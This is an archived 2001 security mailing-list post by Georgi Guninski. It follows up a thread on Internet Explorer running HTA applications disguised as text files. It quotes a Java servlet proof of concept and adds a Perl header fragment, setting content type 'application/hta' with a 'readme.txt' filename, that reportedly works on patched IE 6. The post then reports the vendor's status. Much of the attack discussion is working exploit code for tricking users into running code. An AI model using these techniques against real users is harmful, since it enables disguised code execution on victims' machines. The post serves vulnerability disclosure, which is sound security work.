Re: MSIE may download and run progams automatically - NOT SO FAST

From: Georgi Guninski (guninskiat_private)
Date: Tue Dec 18 2001 - 10:09:54 PST

Next message: Eric Maiwald: "Re: IIS 5.0 Content Length DOS vulnerability"

Previous message: Przemyslaw Frasunek: "Re: Zyxel Prestige 681 and 1600 (possibly other?) remote DoS"
In reply to: jelmer: "RE: MSIE may download and run progams automatically - NOT SO FAST"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

jelmer wrote:
> 
> Here's another way to go about it (without the use of mhtml files)
> 
>   package nl.xs4all.kuperus.exploits;
> 
>   import javax.servlet.http.HttpServlet;
>   import javax.servlet.http.HttpServletRequest;
>   import javax.servlet.http.HttpServletResponse;
>   import javax.servlet.ServletException;
>   import java.io.IOException;
>   import java.io.PrintWriter;
> 
>   public class SpoofIt extends HttpServlet {
> 
>       protected void doGet(HttpServletRequest request,
> HttpServletResponse response) throws ServletException, IOException {
> 
>           response.setContentType("application/hta");
>           response.setStatus(201);
> 
>           PrintWriter out = response.getWriter();
>           out.write("this is a hta");
> 
>       }
> 
>       protected void doPost(HttpServletRequest request,
> HttpServletResponse response) throws ServletException, IOException {
>           super.doGet(request, response);
>       }
>   }
> 
> Once the user clicks on open the hta file is started according to its
> mime type
> Application/hta. all the time the user is thinking it is actually a .txt
> file
> 
> On ie 5.5 this works even without the response code set to 200
> On ie 6 with all patches in place including the latest 'mega pack :)'
> you have to set the
> content type to something other then 200 or the hta extension will show
> 
> A working example is available at
> 
> http://kuperus.xs4all.nl/microsoft.txt
> 

A modification in perl which don't need playing with 200 is:
...
print "Content-type: application/hta\n";
print "Content-disposition: inline; filename=\"readme.txt\"\n";
...more stuff...
This works on the so called "patched" IE 6.0.

Vendor status:
microsoft was informed on 15.December.2001.
2 days later they pretended they have not received the perl attachment
I sent to them and also cc'ed to myself (and sure, I received my attachment).
Have not heard from them since then.

Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Georgi Guninski
http://www.guninski.com

Next message: Eric Maiwald: "Re: IIS 5.0 Content Length DOS vulnerability"
Previous message: Przemyslaw Frasunek: "Re: Zyxel Prestige 681 and 1600 (possibly other?) remote DoS"
In reply to: jelmer: "RE: MSIE may download and run progams automatically - NOT SO FAST"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Dec 18 2001 - 11:36:02 PST